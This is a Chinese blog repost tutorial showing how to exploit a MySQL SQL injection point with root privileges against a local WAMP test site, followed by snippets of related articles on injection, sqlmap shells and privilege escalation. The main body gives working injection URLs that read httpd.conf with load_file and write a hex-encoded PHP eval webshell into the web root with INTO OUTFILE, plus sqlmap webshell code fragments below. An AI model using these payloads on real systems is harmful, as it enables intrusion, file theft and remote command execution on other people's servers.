Mysql注入root权限直接写一句话马

最新推荐文章于 2024-08-20 10:54:35 发布
最新推荐文章于 2024-08-20 10:54:35 发布
阅读量578 收藏
点赞数
文章标签: 数据库 php
原文链接:http://www.cnblogs.com/BloodZero/p/4432549.html
版权

首先我们的找到一个有注入的站:这里我用自己搭建的环境表示;大家不要乱来

http://localhost/pentest/sql/sql_injection_get.php?id=1

发现是root权限,我们尝试直接写马

首先要找到网站的主目录:

数据库目录:D:\wamp\bin\mysql\mysql5.5.20\data\

进行判断,服务器可能为wampserver简易版,httpd.conf文件在D:/wamp/bin/apache/Apache2.2.21/conf/httpd.conf

http://localhost/pentest/sql/sql_injection_get.php?id=1' and 1=2 union select 1,2,3 load_file('D:/wamp/bin/apache/Apache2.2.21/conf/httpd.conf') from user--+

如果这样不成功,建议将目录转换为hex编码进行:即 load_file(0x443A5C77616D705C62696E5C6170616368655C417061636865322E322E32315C636F6E665C68747470642E636F6E66)

 

找到了网站目录:D:/wamp/www

我们尝试写:

http://localhost/pentest/sql/sql_injection_get.php?id=1' and 1=2 union select 1,2,0x3C3F706870206576616C28245F504F53545B27636D64275D293B3F3E into outfile 'D:/wamp/www/xx.php' from user --+

<?php eval($_POST['cmd']);?>的hex编码:0x3C3F706870206576616C28245F504F53545B27636D64275D293B3F3E

 

然后访问:http://localhost/xx.php

 

转载于:https://www.cnblogs.com/BloodZero/p/4432549.html

aipei5098
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql注入一句话_MySQL手工注入步骤+直接一句话
weixin_29227585的博客
01-19 2729
(1)判断注入点 接着通过and 1=1 和 and 1=2测试发现前者正常,后者异常,可以肯定存在注入点,接下来判断该页面查询数据库的字段(2)查询字段数http://unisscan.cn/list.php?lei=246 order by n--结果发现有31个字段 (3)看看哪些字段可以显示信息http://unisscan.cn/list.php?lei=246 and 1=2 uni...
mysql root权限_Mysql root权限下的注入利用技巧( 一 )
weixin_31067223的博客
01-18 344
虽说是root权限,但这并不意味着,你就可以在目标系统中为所欲为,假如目标的root被降了权,或者你想shell的目标网站目录都不可,这时,即使你是root权限,能干的事儿也一样非常的有限,当我们在实战中遇到一个mysql root权限注入点时,想干或者暂时能干的事情无非就下面这些,接下来,会针对每种方法做详细演示: 一、查出目标数据库root的密码然后尝试外连,前提是得目标允许root用户...
sqlmap挂命令
Lyh0558的博客
04-13 4070
--os-shell 了两个 一个是上传功能的 一个是通过上传的进行shell的上传。 (tmpukjhb.php上传了一个tmpbezal.php的文件,tmpbezal.php这个文件可以用来执行系统命令,并且将结果返回出来) Tmpbezal.php 1 <?php 2 $c=$_REQUEST["cmd"]; 3 @set_time_limit(0); 4 @ignore_user_abort(1); 5 @ini_set('max_execution_tim..
MYSQL数据库讲解
qq_49422880的博客
04-01 2743
MYSQL数据库讲解0x01 前言0x02 日志🐎0x03 into outfile🐎 0x01 前言   最近正好在上数据库的课程,比较详细地学习了数据库各个方面地知识。感觉解决了之前不少的疑惑,再吐槽一下(学校开数据库这门课开的太晚了!)   下面进行分析与讲解数据库的过程。 0x02 日志🐎 众所周知我们所有的数据库的都有一个存放日志的文件,这个文件可以会进行记录数据库的操作语句,也可能不会记录数据库的操作语句,这却决于两个全局变量: general_log==>日志保存状态,有
DVWA通过SQL注入儿及直接通过sqlmap获取shell避坑指南
qq_38053759的博客
12-29 3050
DVWA通过SQL注入儿及直接通过sqlmap获取shell避坑指南 走过的坑,随手记下!!! 1. 通过sql注入入木文件 sql注入入木文件要求:1)secure-file-priv参数设置为空 2)入的参数列名排序规则兼容 3) 知道服务器的绝对路径(路径要双分隔符,避免被转义) 1....
5、聊聊一些sql注入的零散知识点
划水的小白白
10-08 1988
sqlmap一句的具体过程 堆叠注入 union injection(联合注入) 常见的注入绕过姿势 sql注入预编译与常见绕过姿势
mysql root 注入_Mysql root权限下的注入利用技巧( 一 )
weixin_28933797的博客
01-20 121
虽说是root权限,但这并不意味着,你就可以在目标系统中为所欲为,假如目标的root被降了权,或者你想shell的目标网站目录都不可,这时,即使你是root权限,能干的事儿也一样非常的有限,当我们在实战中遇到一个mysql root权限注入点时,想干或者暂时能干的事情无非就下面这些,接下来,会针对每种方法做详细演示:一、查出目标数据库root的密码然后尝试外连,前提是得目标允许root用户远...
MAC上Mysql忘记Root密码或权限错误的快速解决方案
01-19
最近一段时间都在倒腾mantis发现总是连接mysql出错,就随手修改了root权限,导致登录不上了。 下面给大家分享还原root权限和更改root密码的最便捷方法。 1:装mysql workbench 。可视化界面直接操作。 2:苹果->...
mysql免安装没有任何root权限
12-16
在IT行业中,数据库管理是至关重要的任务之一,MySQL作为一款广泛应用的关系型数据库管理系统,其安全性与权限管理尤为重要。本文将详细介绍如何在没有root权限的情况下在Linux系统上安装和配置MySQL Community ...
mysqlroot开启远程访问权限,修改root密码
10-28
Mysql作为一个广泛使用的关系数据库管理系统,在实际应用中经常需要对root用户进行远程访问权限的设置和密码修改。这种操作的主要目的是为了提高服务器的安全性和可扩展性。下面我们将详细介绍如何对Mysqlroot用户...
SQL注入与ASP木上传的又一思路.txt
07-06
·中华隐者
MySQL用户和权限及破解root口令的方法示例
09-09
本文将深入探讨MySQL用户和权限的管理,以及如何破解MySQLroot口令。 首先,MySQL中的用户是由用户名和主机名两部分组成的,这样的设计使得可以为不同主机上的同一名用户提供不同的访问权限。例如,创建一个名为`...
一句话开启mysql root外连.txt
11-07
如果遇到了 服务器开启了 3306 端口,但是不允许root外连的情况,我们可以在shell里面执行如下的语句来开启root用户的外连,方便我们提权。
真实渗透改编--综合渗透 sql注入+文件上传+udf提权 安鸾靶场SQL注入学习
AAAAAAAAAAAA66的博客
02-16 4850
从去年12月末到现在2月中,也算是把这个靶场的大多数题目刷了一遍,自己也能算的上一个初学者把,本文具体的教程在b站上有(建立靶场的师傅),而本文记录自己的解题和思考过程。如果之前没有接触到这些知识点的同学,可能会感觉到比较吃力,这是正常的。 哈兹本得的个人空间_哔哩哔哩_Bilibili 题目URL http://106.15.50.112:8023/ 目录 解题过程 sql注入 ​ 提权 准备udf文件(提权文件) 实施 解题过程 sql注入 寻找注入点 寻找网站真实.
【SQL注入】sqli-labs手注+sqlmap
m0_63563528的博客
07-19 2175
第一周:SQL注入学习
MySQL详解
jklbnm12的博客
08-14 1986
日志 条件 1.全局变量general_log为ON MySQL的两个全局变量: general_log指的是日志保存状态,一共有两个值(ON/OFF)ON代表开启 OFF代表关闭。 general_log_file 指的是日志的保存路径。 mysql> show global variables like "%general\_log%";+------------------+--------------------------------------------------------+|
sql注入学习
qq_42685664的博客
03-18 1666
sql注入学习
mysql_Mysql与提权
weixin_31289551的博客
01-18 737
密码读取直接从配置文件中读取数据库账号密码爆破账号密码读取数据库目录中的user.MYD,root后的字符串为其用户加密值,在线解密或者hashcat即可脱库利用条件:权限rootsecure_file_priv没有具体值show global variables like '%secure_file_priv%'; 查看secure_file_priv的值secure_file_priv的值为...
【达梦数据库】导入导出过程中get DDL复现过程
最新发布
weixin_47686079的博客
08-20 333
在处理问题的过程中,客户反馈在达梦数据库中导入导出分区表,get 表的DDL,不会出现表的所有分区信息,ORACLE数据库却会出现所有分区表,事实真的如此吗?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值